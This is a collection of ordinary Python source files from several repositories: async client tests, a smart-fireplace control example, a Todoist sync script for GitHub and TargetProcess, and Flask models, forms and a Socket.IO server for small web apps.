await rw.add_flow([("write", clear_in), ("read", clear_out)])
assert await hc.async_clear(priority=50, tan=100) == clear_out
# Test a call with a duplicate tan (will raise an exception).
await rw.add_flow([("write", clear_in), ("read", clear_out)])
with pytest.raises(client.HyperionClientTanNotAvailable):
await asyncio.gather(
hc.async_clear(priority=50, tan=100),
hc.async_clear(priority=50, tan=100),
)
await rw.assert_flow_finished()
# Test a custom tan and an automated tan, should succeed with the automated
# tan choosing the next number.
clear_in_1 = {"command": "clear", "priority": 50, "tan": 1}
clear_in_2 = {"command": "clear", "priority": 50, "tan": 2}
clear_out_1 = {"command": "clear", "success": True, "tan": 1}
clear_out_2 = {"command": "clear", "success": True, "tan": 2}
await rw.add_flow(
[
("write", clear_in_1),
("write", clear_in_2),
("read", clear_out_1),
("read", clear_out_2),
]
)
result_a, result_b = await asyncio.gather(
hc.async_clear(priority=50, tan=1),
hc.async_clear(priority=50),
)
assert clear_out_1 == result_a
assert clear_out_2 == result_b
async def test_async_send_calls_have_async_call(
event_loop: asyncio.AbstractEventLoop,
) -> None:
"""Verify async_send_* methods have an async_* pair."""
for name, value in inspect.getmembers(client.HyperionClient):
if name.startswith("async_send_") and callable(value):
new_name = "async_" + name[len("async_send_") :]
wrapper = getattr(client.HyperionClient, new_name, None)
assert wrapper is not None
# wrapper.func -> Returns a partial for AwaitResponseWrapper.__call__()
# .__self__ -> AwaitResponseWrapper
# ._coro -> The wrapped coroutine within AwaitResponseWrapper.
# pylint: disable=protected-access
assert wrapper.func.__self__._coro == value
@pytest.mark.asyncio
async def test_double_connect(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test the behavior of a double connect call."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
with patch("asyncio.open_connection", return_value=(rw, rw)):
assert await hc.async_client_connect()
assert hc.is_connected
@pytest.mark.asyncio
async def test_double_disconnect(
event_loop: asyncio.AbstractEventLoop, rw: MockStreamReaderWriter
) -> None:
"""Test the behavior of a double disconnect call."""
hc = await _create_client_and_connect(rw)
await _disconnect_and_assert_finished(rw, hc)
assert await hc.async_client_disconnect()
def test_generate_random_auth_id() -> None:
"""Test arandomly generated auth id."""
random_id = client.generate_random_auth_id()
assert len(random_id) == 5
for c in random_id:
assert c in (string.ascii_letters + string.digits)
@pytest.mark.asyncio
async def test_sysinfo(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test the sysinfo command."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
sysinfo_in = {"command": "sysinfo", "tan": 2}
sysinfo_out: dict[str, Any] = {
**TEST_SYSINFO_RESPONSE,
"tan": 2,
}
await rw.add_flow([("write", sysinfo_in), ("read", sysinfo_out)])
assert await hc.async_sysinfo() == sysinfo_out
@pytest.mark.asyncio
async def test_sysinfo_id(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Verify fetching the sysinfo id."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
sysinfo_in = {"command": "sysinfo", "tan": 2}
sysinfo_out: dict[str, Any] = {
**TEST_SYSINFO_RESPONSE,
"tan": 2,
}
await rw.add_flow([("write", sysinfo_in), ("read", sysinfo_out)])
assert await hc.async_sysinfo_id() == TEST_SYSINFO_ID
@pytest.mark.asyncio
async def test_sysinfo_version(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Verify fetching the sysinfo version."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
sysinfo_in = {"command": "sysinfo", "tan": 2}
sysinfo_out: dict[str, Any] = {
**TEST_SYSINFO_RESPONSE,
"tan": 2,
}
await rw.add_flow([("write", sysinfo_in), ("read", sysinfo_out)])
assert await hc.async_sysinfo_version() == TEST_SYSINFO_VERSION
@pytest.mark.asyncio
async def test_context_manager(
event_loop: asyncio.AbstractEventLoop, rw: MockStreamReaderWriter
) -> None:
"""Test the context manager functionality."""
with patch("asyncio.open_connection", return_value=(rw, rw)):
async with client.HyperionClient(TEST_HOST, TEST_PORT) as hc:
assert hc
assert hc.is_connected
await rw.assert_flow_finished()
await rw.add_flow([("close", None)])
await _block_until_done(rw)
await rw.assert_flow_finished()
assert not hc.is_connected
async def test_response_ok() -> None:
"""Test case for the Hyperion Client ResponseOK class."""
# Intentionally pass the wrong type.
assert not client.ResponseOK(["not", "a", "dict"]) # type: ignore[arg-type]
assert not client.ResponseOK({"data": 1})
assert not client.ResponseOK({const.KEY_SUCCESS: False})
assert client.ResponseOK({const.KEY_SUCCESS: True})
```
|
{
"source": "jeeftor/intellifire4py",
"score": 3
}
|
#### File: jeeftor/intellifire4py/example.py
```python
import asyncio
import os
import time
from intellifire4py import (
AsyncUDPFireplaceFinder,
IntellifireControlAsync,
IntellifireFireplace,
UDPFireplaceFinder,
)
from intellifire4py.control_async import IntellifireSendMode
from intellifire4py.exceptions import LoginException
async def main() -> None:
"""Run main function."""
print("----- Find Fire Places - Sync Mode (waiting 3 seconds)-----")
finder = UDPFireplaceFinder()
print(finder.search_fireplace(timeout=3))
print("----- Find Fire Places - Aync Mode (waiting 3 seconds)-----")
af = AsyncUDPFireplaceFinder()
await af.search_fireplace(timeout=3)
ip = af.ips[0]
print(f"-- Found fireplace at [{ip}] --")
"""Run main function."""
print(
"""
Accessing IFTAPI Username and Password via Environment Variables
- if these aren't set please do so, also
you will see some errors probably
export IFT_USER=<username>
export IFT_PASS=<password>
"""
)
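    # Note: os.environ[...] below raises KeyError if a variable is unset; a
    # gentler sketch would be os.environ.get("IFT_USER", "") plus a check.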
username = os.environ["IFT_USER"]
    password = os.environ["IFT_PASS"]
print("--- Creating Fireplace Controller ---")
ift_control = IntellifireControlAsync(
fireplace_ip=ip, use_http=True, verify_ssl=False
)
try:
try:
print(" -- Purposefully trying a bad password!")
await ift_control.login(username=username, password="<PASSWORD>")
except LoginException:
print(" -- Now trying again correctly.")
try:
await ift_control.login(username=username, password=password)
except LoginException:
print(
"-- Could not login - make sure the login vars are correct ... bye --"
)
exit(1)
print("Logged in:", ift_control.is_logged_in)
# Get location list
locations = await ift_control.get_locations()
location_id = locations[0]["location_id"]
print(" -- Using location_id: ", location_id)
username = await ift_control.get_username()
print(" -- Accessing Username Cookie: ", username)
# Extract a fireplace
fireplaces = await ift_control.get_fireplaces(location_id=location_id)
fireplace: IntellifireFireplace = fireplaces[0]
default_fireplace = ift_control.default_fireplace
print("Closing Session")
await ift_control.close()
fireplaces = await ift_control.get_fireplaces(location_id=location_id)
username = await ift_control.get_username()
print("username", username)
print("Serial:", default_fireplace.serial)
print("APIKey:", default_fireplace.apikey)
# Send a soft reset command?
ift_control.send_mode = IntellifireSendMode.CLOUD
await ift_control.soft_reset(fireplace=default_fireplace)
await ift_control.flame_on(fireplace=fireplace)
# print('await ift_control.set_flame_height(fireplace=default_fireplace, height=4)')
# await ift_control.set_flame_height(fireplace=default_fireplace, height=4)
# time.sleep(10)
# ift_control.send_mode = IntellifireSendMode.CLOUD
# print('await ift_control.set_flame_height(fireplace=default_fireplace, height=0)')
# await ift_control.set_flame_height(fireplace=default_fireplace, height=0)
# sleep_time = 5
# await ift_control.flame_on(fireplace=fireplace)
# await ift_control.set_fan_speed(fireplace=fireplace, speed=0)
# time.sleep(sleep_time)
# await ift_control.set_fan_speed(fireplace=fireplace, speed=1)
# time.sleep(sleep_time)
# await ift_control.set_fan_speed(fireplace=fireplace, speed=2)
# time.sleep(sleep_time)
# await ift_control.set_fan_speed(fireplace=fireplace, speed=3)
# await ift_control.flame_off(fireplace=fireplace)
# exit(0)
for control in [IntellifireSendMode.LOCAL, IntellifireSendMode.CLOUD]:
print("Using çontrol Møde: ", control)
ift_control.send_mode = control
sleep_time = 5
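            # NOTE: time.sleep blocks the event loop; acceptable in this linear
            # demo, but asyncio.sleep would be the non-blocking choice.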
await ift_control.flame_off(fireplace=default_fireplace)
time.sleep(sleep_time)
await ift_control.flame_on(fireplace=fireplace)
time.sleep(sleep_time)
await ift_control.set_flame_height(fireplace=default_fireplace, height=1)
time.sleep(sleep_time)
await ift_control.set_flame_height(fireplace=fireplace, height=2)
time.sleep(sleep_time)
await ift_control.set_flame_height(fireplace=fireplace, height=3)
time.sleep(sleep_time)
await ift_control.set_flame_height(fireplace=fireplace, height=4)
time.sleep(sleep_time)
# await ift_control.set_flame_height(fireplace=fireplace, height=5)
# time.sleep(sleep_time)
await ift_control.set_flame_height(fireplace=fireplace, height=1)
time.sleep(sleep_time)
await ift_control.set_fan_speed(fireplace=fireplace, speed=0)
time.sleep(sleep_time)
await ift_control.set_fan_speed(fireplace=fireplace, speed=2)
time.sleep(sleep_time)
await ift_control.set_fan_speed(fireplace=fireplace, speed=3)
time.sleep(sleep_time)
await ift_control.set_fan_speed(fireplace=fireplace, speed=4)
time.sleep(sleep_time)
await ift_control.set_fan_speed(fireplace=fireplace, speed=1)
time.sleep(sleep_time)
await ift_control.beep(fireplace=fireplace)
time.sleep(sleep_time)
await ift_control.flame_off(fireplace=fireplace)
finally:
await ift_control.close()
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
```
#### File: intellifire4py/intellifire4py/exceptions.py
```python
class ApiCallException(Exception):
"""Error with the API call."""
class InputRangeException(Exception):
"""Input out of bounds."""
def __init__(self, field: str, min_value: int, max_value: int):
"""Initialize the exception."""
self.message = (
f"{field} is out of bounds: valid values [{min_value}:{max_value}]"
)
super().__init__(self.message)
class LoginException(Exception):
"""Failure with the login process."""
```
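A minimal, hedged sketch of how `InputRangeException` might surface in client code; the `flame_height` bounds below are illustrative assumptions, not values taken from the library:
```python
from intellifire4py.exceptions import InputRangeException

def set_flame_height(height: int) -> None:
    # The 0..4 range is an assumption for this sketch.
    if not 0 <= height <= 4:
        raise InputRangeException(field="flame_height", min_value=0, max_value=4)

try:
    set_flame_height(9)
except InputRangeException as err:
    print(err)  # flame_height is out of bounds: valid values [0:4]
```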
#### File: intellifire4py/intellifire4py/__init__.py
```python
from __future__ import annotations
from intellifire4py.const import IntellifireErrorCode
from intellifire4py.control_async import IntellifireControlAsync
from intellifire4py.intellifire_async import IntellifireAsync
from intellifire4py.model import (
IntellifireFireplace,
IntellifireFireplaces,
IntellifireLocationDetails,
IntellifireLocations,
IntellifirePollData,
)
from intellifire4py.udp import AsyncUDPFireplaceFinder, UDPFireplaceFinder
class ApiCallException(Exception):
"""Error with the API call."""
class InputRangeException(Exception):
"""Input out of bounds."""
def __init__(self, field: str, min_value: int, max_value: int):
"""Initialize the exception."""
self.message = (
f"{field} is out of bounds: valid values [{min_value}:{max_value}]"
)
super().__init__(self.message)
class LoginException(Exception):
"""Failure with the login process."""
```
#### File: intellifire4py/tests/test_const.py
```python
from unittest import TestCase
from intellifire4py.const import IntellifireErrorCode
class TestErrors(TestCase):
"""Test Case."""
def test_errors(self) -> None:
"""Test Function."""
e = IntellifireErrorCode(642)
assert e == IntellifireErrorCode.OFFLINE
```
|
{
"source": "jeeftor/pysunpower",
"score": 3
}
|
#### File: pysunpower/tests/test_model.py
```python
import pytest
from pysunpower.sunpowermodel import SunPowerModel, SupervisorModel, ProductionModel, ConsumptionModel, \
TypeGInverterModel
def test_type_g():
"""Test TypeG Data Parsing"""
    with open('type_g.json') as f:
        json_data = f.read()
data = SunPowerModel.parse_raw(json_data)
assert (data.devices[0].DEVICE_TYPE == "PVS")
assert (len(data.devices) == 21) # 3 control devices and 18 inverters
assert type(data.devices[0]) is SupervisorModel
assert type(data.devices[1]) is ProductionModel
assert type(data.devices[2]) is ConsumptionModel
assert type(data.devices[3]) is TypeGInverterModel
```
|
{
"source": "jeefy/nirvana",
"score": 2
}
|
#### File: jeefy/nirvana/main.py
```python
import github
import todoist
import requests
import datetime
import logging
import os
import json
import yaml
try:
from yaml import CLoader as Loader
except ImportError:
from yaml import Loader
from typing import Dict
# TargetProcess specific logic
def getTargetprocessTasks(cfg:Dict) -> Dict[str, Dict]:
tp_url = cfg['targetProcess']['url'] + '/api/v2/userstories?filter=?{}&take=100&select=%7Bid,storyName:name,bugs:Bugs.Where(EntityState.IsFinal!=true),tasks:Tasks.Where(EntityState.IsFinal!=true),project:%7Bproject.id,project.name%7D%7D&access_token={}'
logging.info("TargetProcess URL: {}".format(tp_url))
try:
r = requests.get(tp_url.format(cfg['targetProcess']['query'], cfg['targetProcess']['token']))
except Exception as e:
logging.fatal('Cannot connect to TargetProcess')
logging.fatal(e)
exit(1)
data = {}
for task in r.json()['items']:
task['name'] = task['storyName']
task['url'] = "https://umarcts.tpondemand.com/RestUI/Board.aspx#page=userstory/{}".format(task['id'])
data[formatTargetprocessTask(task)] = task
logging.info('Task found: {}'.format(task['name']))
for subtask in task['tasks']:
subtask['parent'] = formatTargetprocessTask(task)
subtask['project'] = task['project']
subtask['url'] = "https://umarcts.tpondemand.com/RestUI/Board.aspx#page=task/{}".format(subtask['id'])
data[formatTargetprocessTask(subtask)] = subtask
logging.info('Subtask found: {}'.format(subtask['name']))
for bug in task['bugs']:
bug['parent'] = formatTargetprocessTask(task)
bug['project'] = task['project']
bug['url'] = "https://umarcts.tpondemand.com/RestUI/Board.aspx#page=task/{}".format(bug['id'])
data[formatTargetprocessTask(bug)] = bug
logging.info('Bug found: {}'.format(bug['name']))
logging.debug(r.json()['items'])
return data
def syncWithTargetprocess(api: todoist.TodoistAPI, cfg: Dict):
tasks = getTargetprocessTasks(cfg)
logging.info("Syncing {} TargetProcess objects to Todoist".format(len(tasks)))
tpLabel = findOrCreateLabel(api, cfg['targetProcess']['defaultLabel'])
if 'defaultParentProject' in cfg['targetProcess']:
parentProject = findOrCreateProject(api, cfg['targetProcess']['defaultParentProject'])
labels = [tpLabel['id']]
if 'labels' in cfg['targetProcess']:
for v in cfg['targetProcess']['labels']:
label = findOrCreateLabel(api, v)
labels.append(label['id'])
item:todoist.models.Item
for item in api['items']:
if tpLabel['id'] in item['labels']:
logging.debug("Item {} has label {}".format(item['content'], tpLabel['id']))
found = False
for k in tasks.keys():
if k in item['content']:
logging.debug("Item {} matches {}".format(item['content'], k))
found = True
break
if not found:
logging.info("Marking {} as complete".format(item['content']))
item.complete()
for k,task in tasks.items():
tpProject = findOrCreateProject(api, task['project']['name'])
if 'defaultParentProject' in cfg['targetProcess']:
tpProject.move(parent_id=parentProject['id'])
item = findTaskWithContents(api, formatTargetprocessTask(task))
taskName = "[{}]({}) - {}".format(k, task['url'], task['name'])
if item is None:
if 'parent' in task:
parent = findTaskWithContents(api, task['parent'])
logging.info("Adding task: {} with parent {}".format(taskName, task['parent']))
api.items.add(taskName, project_id=tpProject['id'], parent_id=parent['id'], labels=labels)
else:
logging.info("Adding task: {}".format(taskName))
api.items.add(taskName, project_id=tpProject['id'], labels=labels)
else:
logging.info("Syncing task: {}".format(task['name']))
taskName = "[{}]({}) - {}".format(k, task['url'], task['name'])
api.items.update(item['id'], content=taskName)
def formatTargetprocessTask(task):
return "TP#{}".format(task['id'])
# Github specific logic
def getGithubTasks(cfg:Dict) -> Dict[str, github.Issue]:
try:
g = github.Github(cfg['github']['token'])
except Exception as e:
logging.fatal('Could not authenticate to GitHub')
logging.fatal(e)
exit(1)
issues = g.search_issues(cfg['github']['query'])
data = {}
issue:github.Issue
for issue in issues:
data[formatGithubIssue(issue)] = issue
logging.debug(data)
return data
def formatGithubIssue(issue: github.Issue) -> str:
issueType = "issue"
if issue.pull_request is not None:
issueType = "pr"
return "{} {}#{}".format(issue.repository.full_name, issueType, issue.number)
def formatGithubProject(issue: github.Issue, cfg: Dict) -> str:
projectName = issue.repository.full_name
if 'defaultProject' in cfg['github']:
projectName = cfg['github']['defaultProject']
for k,v in cfg['github']['projectMap'].items():
if k in issue.repository.full_name:
projectName = v
return projectName
def syncWithGithub(api: todoist.TodoistAPI, cfg: Dict):
issues = getGithubTasks(cfg)
logging.info("Syncing {} GitHub objects to Todoist".format(len(issues)))
githubLabel = findOrCreateLabel(api, cfg['github']['defaultLabel'])
item:todoist.models.Item
for item in api['items']:
if githubLabel['id'] in item['labels']:
logging.debug("Item {} has label {}".format(item['content'], githubLabel['id']))
found = False
for k in issues.keys():
if k in item['content']:
logging.debug("Found task: {} in {}".format(k, item['content']))
found = True
break
if not found:
logging.info("Marking {} as complete".format(item['content']))
item.complete()
issue:github.Issue
for k,issue in issues.items():
logging.debug(issue.pull_request)
labels = [githubLabel['id']]
if 'labels' in cfg['github']:
for v in cfg['github']['labels']:
label = findOrCreateLabel(api, v)
labels.append(label['id'])
repoProject = findOrCreateProject(api, formatGithubProject(issue, cfg))
item = findTaskWithContents(api, formatGithubIssue(issue))
if 'labelMap' in cfg['github']:
for labelKey,labelList in cfg['github']['labelMap'].items():
logging.debug("Seeing if {} is in {}".format(labelKey, k))
if labelKey in k:
for a in labelList:
label = findOrCreateLabel(api, a)
labels.append(label['id'])
if item is None:
api.items.add("[{}]({}) - {}".format(k, "https://github.com/{}/issues/{}".format(issue.repository.full_name, issue.number), issue.title), project_id=repoProject['id'], labels=labels)
else:
api.items.update(item['id'], content="[{}]({}) - {}".format(k, "https://github.com/{}/issues/{}".format(issue.repository.full_name, issue.number), issue.title))
# Todoist Specific Logic
def findOrCreateLabel(api: todoist.TodoistAPI, query: str) -> todoist.models.Label:
logging.info("Find or create label: {}".format(query))
for label in api['labels']:
if label['name'] == query:
logging.info("Label found: {}".format(label['name']))
return label
label = api.labels.add(query)
logging.info("Creating label: {}".format(query))
logging.debug(label)
return label
def findOrCreateProject(api: todoist.TodoistAPI, query: str) -> todoist.models.Project:
logging.info("Find or create project: {}".format(query))
for project in api['projects']:
if project['name'] == query:
logging.info("Project found: {}".format(project['name']))
return project
project = api.projects.add(query)
logging.info('Creating project: {}'.format(query))
logging.debug(project)
return project
def findTaskWithContents(api: todoist.TodoistAPI, query: str) -> todoist.models.Item:
logging.info("Looking for task: {}".format(query))
for item in api['items']:
if query in item['content']:
logging.info("Task found: {}".format(item['content']))
return item
logging.info("Task NOT found: {}".format(query))
return None
# Config Loader
def loadConfig():
logging.info('Parsing config')
with open(os.environ.get('NIRVANA_CONFIG', default='config.yaml'), 'r') as ymlfile:
cfg = yaml.load(ymlfile, Loader=Loader)
tdTokenEnv = os.environ.get('TODOIST_TOKEN', None)
if tdTokenEnv is not None:
if 'todoist' not in cfg:
cfg['todoist'] = {}
cfg['todoist']['token'] = tdTokenEnv
tpTokenEnv = os.environ.get('TP_TOKEN', None)
if tpTokenEnv is not None:
if 'targetProcess' not in cfg:
cfg['targetProcess'] = {}
cfg['targetProcess']['token'] = tpTokenEnv
ghTokenEnv = os.environ.get('GH_TOKEN', None)
if ghTokenEnv is not None:
if 'github' not in cfg:
cfg['github'] = {}
cfg['github']['token'] = ghTokenEnv
return cfg
#########
def main():
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG, filename='debug.log')
cfg = loadConfig()
logging.debug(cfg)
try:
api = todoist.TodoistAPI(cfg['todoist']['token'])
except Exception as e:
logging.fatal('Failed to connect to Todoist')
logging.fatal(e)
exit(1)
api.reset_state()
api.sync()
logging.info('Oh hi {}!'.format(api.state['user']['full_name']))
logging.debug(api['items'])
if 'github' in cfg:
syncWithGithub(api, cfg)
api.commit()
if 'targetProcess' in cfg:
syncWithTargetprocess(api, cfg)
api.commit()
logging.debug(api)
if __name__ == '__main__':
    main()
```
|
{
"source": "jeehan24/the-vikings",
"score": 3
}
|
#### File: the-vikings/project/models.py
```python
import datetime
import jwt
from . import bcrypt, db, app
class BaseModel(db.Model):
"""Base data model for all objects"""
__abstract__ = True
def __init__(self, *args):
super().__init__(*args)
def __repr__(self):
"""Define a base way to print models"""
return '%s(%s)' % (self.__class__.__name__, {
column: value
for column, value in self._to_dict().items()
})
def json(self):
"""
Define a base way to jsonify models, dealing with datetime objects
"""
return {
column: value if not isinstance(value, datetime.date) else value.strftime('%Y-%m-%d')
for column, value in self._to_dict().items()
}
class User(BaseModel, db.Model):
""" User Model for storing user related details """
__tablename__ = "users"
__table_args__ = {'extend_existing': True}
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
email = db.Column(db.String(255), unique=True, nullable=False)
username = db.Column(db.String(255), unique=True, nullable=False)
password = db.Column(db.String(255), nullable=False)
registered_on = db.Column(db.DateTime, nullable=False)
admin = db.Column(db.Boolean, nullable=False, default=False)
def __init__(self, email, username, password, admin=False):
self.email = email
self.username = username
self.password = <PASSWORD>.generate_password_hash(
password, app.config.get('BCRYPT_LOG_ROUNDS')
).decode()
self.registered_on = datetime.datetime.now()
self.admin = admin
def encode_auth_token(self, user_id):
"""
Generates the Auth Token
:return: string
"""
try:
payload = {
'exp': datetime.datetime.utcnow() + datetime.timedelta(days=365),
'iat': datetime.datetime.utcnow(),
'sub': user_id
}
return jwt.encode(
payload,
app.config.get('SECRET_KEY'),
algorithm='HS256'
)
except Exception as e:
return e
@staticmethod
def decode_auth_token(auth_token):
"""
Validates the auth token
:param auth_token:
:return: integer|string
"""
try:
            payload = jwt.decode(auth_token, app.config.get('SECRET_KEY'), algorithms=['HS256'])
is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)
if is_blacklisted_token:
return 'Token blacklisted. Please log in again.'
else:
return payload['sub']
except jwt.ExpiredSignatureError:
return 'Signature expired. Please log in again.'
except jwt.InvalidTokenError:
return 'Invalid token. Please log in again.'
class BlacklistToken(BaseModel, db.Model):
"""
Token Model for storing JWT tokens
"""
__tablename__ = 'blacklist_tokens'
__table_args__ = {'extend_existing': True}
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
token = db.Column(db.String(500), unique=True, nullable=False)
blacklisted_on = db.Column(db.DateTime, nullable=False)
def __init__(self, token):
self.token = token
self.blacklisted_on = datetime.datetime.now()
def __repr__(self):
return '<id: token: {}'.format(self.token)
@staticmethod
def check_blacklist(auth_token):
# check whether auth token has been blacklisted
res = BlacklistToken.query.filter_by(token=str(auth_token)).first()
if res:
return True
else:
return False
class Project(BaseModel, db.Model):
""" Project Model for storing project related details """
__tablename__ = "projects"
__table_args__ = {'extend_existing': True}
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
owner = db.Column(db.String(), nullable=False)
xml = db.Column(db.String())
name = db.Column(db.String(256), nullable=False)
description = db.Column(db.String())
is_public = db.Column(db.Boolean, default=False)
last_modified = db.Column(db.DateTime, nullable=False)
    num_stars = db.Column(db.Integer, default=0)
parent = db.Column(db.Integer)
def __init__(self,
owner,
name,
is_public,
description="",
xml="",
parent=None
):
self.owner = owner
self.description = description
self.xml = xml
self.is_public = is_public
self.name = name
self.last_modified = datetime.datetime.now()
self.num_stars = 0
self.parent = parent
class Stars(BaseModel, db.Model):
""" Stars model for storing starring details"""
    __tablename__ = "stars"
#__table_args__= {'extend_existing': True}
s_id = db.Column(db.Integer, primary_key=True, autoincrement=True)
project_id = db.Column(db.Integer, nullable=False)
user_id = db.Column(db.Integer, nullable=False)
def __init__(self,
user_id,
project_id,
):
        self.user_id = user_id
self.project_id = project_id
```
|
{
"source": "JeeheeHan/jenmu-bob-ross",
"score": 3
}
|
#### File: JeeheeHan/jenmu-bob-ross/crud.py
```python
from random import choice
from sqlalchemy import func
from model import Painting, db, connect_to_db
import ast
###### Random picks for front page ######
def get_random_quote():
"""Open text file and get a random quote"""
with open ("./data/quotes.txt", "r") as quotes:
all_quotes = quotes.read().rstrip("\n").split("\n\n")
quote = choice(all_quotes)
return quote
def get_random_painting():
"""SCALAR the random img_src """
item = db.session.query(Painting).order_by(func.random()).first()
return item
####### GET the colors ######
def break_down_hex_colors(item):
hexes = ast.literal_eval(item.color_hex)
return hexes
if __name__ == '__main__':
from server import app
connect_to_db(app)
```
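A hedged sketch of the column shape `break_down_hex_colors` expects: `color_hex` stores a Python-literal list of hex strings, so `ast.literal_eval` recovers the list. The stand-in object and hex values below are illustrative, not taken from the dataset:
```python
import ast
from types import SimpleNamespace

# Stand-in for a Painting row; the hex values are made up for illustration.
fake_painting = SimpleNamespace(color_hex="['#4E1500', '#DB0000']")
# The same parse that break_down_hex_colors performs on the stored column:
print(ast.literal_eval(fake_painting.color_hex))  # ['#4E1500', '#DB0000']
```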
|
{
"source": "JeeheeHan/PUL-app",
"score": 3
}
|
#### File: JeeheeHan/PUL-app/forms.py
```python
from model import User
#Reference to:https://flask-wtf.readthedocs.io/en/stable/quickstart.html#creating-forms
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, SelectField, TextAreaField
from wtforms.validators import DataRequired, InputRequired, Length, EqualTo, ValidationError
class LoginForm(FlaskForm):
"""Login form with validation from wtforms"""
username = StringField(u'username', validators=[InputRequired(message="Enter your Username")], render_kw={"placeholder": "Your Username", "class":"login"})
password = PasswordField(u'password', validators=[InputRequired(message="Enter your password")],render_kw={"placeholder": "Your Password","type":"password","class":"login"})
submit = SubmitField("Login")
class RegisterForm(FlaskForm):
"""Register form with the required elements!"""
username = StringField(u'username', validators=[InputRequired(message="Enter your Username"), Length(min=4, max=25, message="Username must be between 4 and 25 characters")], render_kw={"placeholder": "Username","class":"login"})
password = PasswordField(u'password', validators=[InputRequired(message="Enter your Password"), Length(min=4, max=25, message="Password must be between 4 and 25 characters")],render_kw={"placeholder": "Password","type":"password","class":"login"})
    confirm_pswd = PasswordField(u'confirm_pwd', validators=[InputRequired(message="Password required"), EqualTo('password', message="Password needs to match")], render_kw={"placeholder": "Confirm Password","type":"password","class":"login"})
submit = SubmitField("Register")
def validate_username(self, username):
#WTF forms will automatically invoke these
"""Check if username is taken"""
user_ = User.query.filter_by(username=username.data).first()
if user_ is not None:
raise ValidationError("Username taken, please choose another one")
class UserprofileForm(FlaskForm):
"""Edit form to change username or password"""
username = StringField(u'username', validators=[DataRequired()], render_kw={"type":"hidden"})
password = PasswordField(u'password', validators=[DataRequired()],render_kw={"placeholder": "Current Password","type":"password","class":"login"} )
new_password = PasswordField(u'new password', validators=[InputRequired(message="Enter a new desired Password"), Length(min=4, max=25, message="Password must be between 4 and 25 characters")], render_kw={"placeholder": "New Password","type":"password","class":"login"})
    confirm_new_pswd = PasswordField(u'confirm_new_pwd', validators=[InputRequired(message="Confirm new password"), EqualTo('new_password', message="Password needs to match")],render_kw={"placeholder": "Confirm New Password","type":"password","class":"login"})
submit = SubmitField("Update")
class WordsForm(FlaskForm):
"""Form to get polarity of requested text"""
    analysis = SelectField(u'Opinion Mining', choices=[('pat', 'Dictionary based (Pattern Library)'), ('naive', 'Movie Ratings based (NaiveBayes)')], render_kw={"class":"wordform"})
    text = TextAreaField(u'Text', validators=[Length(max=200)],render_kw={"placeholder":"Polarity ranges from 1 (most positive) to -1 (most negative)", "class":"wordform"})
submit = SubmitField("Run")
```
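To illustrate the auto-invoked inline-validator pattern that `RegisterForm.validate_username` relies on, a minimal sketch without the database lookup; the form and the "taken" value are illustrative:
```python
from wtforms import Form, StringField
from wtforms.validators import ValidationError

class DemoForm(Form):
    username = StringField('username')

    # WTForms automatically invokes validate_<fieldname> during validate().
    def validate_username(self, field):
        if field.data == 'taken':
            raise ValidationError("Username taken, please choose another one")

form = DemoForm(data={'username': 'taken'})
print(form.validate())  # False
print(form.errors)      # {'username': ['Username taken, please choose another one']}
```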
#### File: JeeheeHan/PUL-app/server.py
```python
from flask import Flask, render_template, request, redirect, jsonify, flash
from jinja2 import StrictUndefined
from flask_socketio import SocketIO, emit
from flask_login import LoginManager,current_user,login_user,logout_user, login_required
from flask_session import Session
import os
from datetime import timedelta
import json
from model import *
from forms import *
import crud
app = Flask(__name__)
app.secret_key = os.environ['SECRET_KEY']
app.config['SESSION_TYPE'] = 'filesystem'
app.config['SESSION_PERMANENT'] = True
#default session time is 31 days for flask so setting it to 30 mins
app.config['PERMANENT_SESSION_LIFETIME'] = timedelta(minutes=30)
app.jinja_env.undefined = StrictUndefined
#Declaring loginmanager into a var and using it as a decorator to check if user is logged in
login_manager = LoginManager(app)
login_manager.login_message = ""
#Socket.IO forks off after copying the session, so disable its session management and let Flask-Session handle sessions
Session(app)
#create the server with the var socketio
socketio = SocketIO(app, manage_session=False)
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
@app.route('/')
def homepage():
"""When the user connects, the database will send over latest inputs to load the html along with the pic appropriate to the plant's health
The sentiment analyzer form is also returned in the homepage"""
count_dict = crud.count_pos_neg()
messages = crud.get_messages()
pic = crud.get_plant_health(crud.get_ratio(count_dict))
form = WordsForm()
return render_template("index.html", messages = messages, count = count_dict, pic = pic, form = form)
##### REAL TIME asynchronous routes ######
@socketio.on('connect')
def connected():
"""Print conncted if any one connects to the website"""
print('Connected!')
@socketio.on('disconnect')
def disconnected():
    """Print 'Disconnected' when anyone disconnects from the website"""
print('Disconnected')
@socketio.on('messaging')
def handle_message(data):
"""Socket's first real listener event when a user sends a message in chat.
So save the user message if the user is active, and return the polarity of
the message input along with the time stamp as a string dictionary in data under event called "new line" """
print('new line', data)
data = json.loads(data)
#Save the incoming messages into General_chat table
if data['username']:
latest_entry = crud.save_chat_message(data)
comp_or_neg = crud.save_nlp(data, latest_entry.chatID)
data['polarity'] = comp_or_neg
data['timestamp'] = latest_entry.timestamp.strftime('%b-%d-%y %H:%M')
emit('new line',data, broadcast=True)
@socketio.on('health')
def handle_plant_health(data):
""" Front end will send back the live chat's pos/neg counts. Server to send back the appropriate pic back to all connected users"""
count_dict = crud.get_ratio(data)
pic = crud.get_plant_health(count_dict)
emit('my_image', {'plant_pic': "plant_pic", 'pic': pic})
##### USER LOGIN, LOGOUT, EDIT PASSWORD, CHECK MESSAGE SENTIMENT routes ######
def check_if_logged_in():
    """Return a redirect to the homepage if the user is already logged in"""
    if current_user.is_authenticated:
        return redirect("/")
    return None
@app.route('/login', methods= ['POST', 'GET'])
def login():
"""login with credentials"""
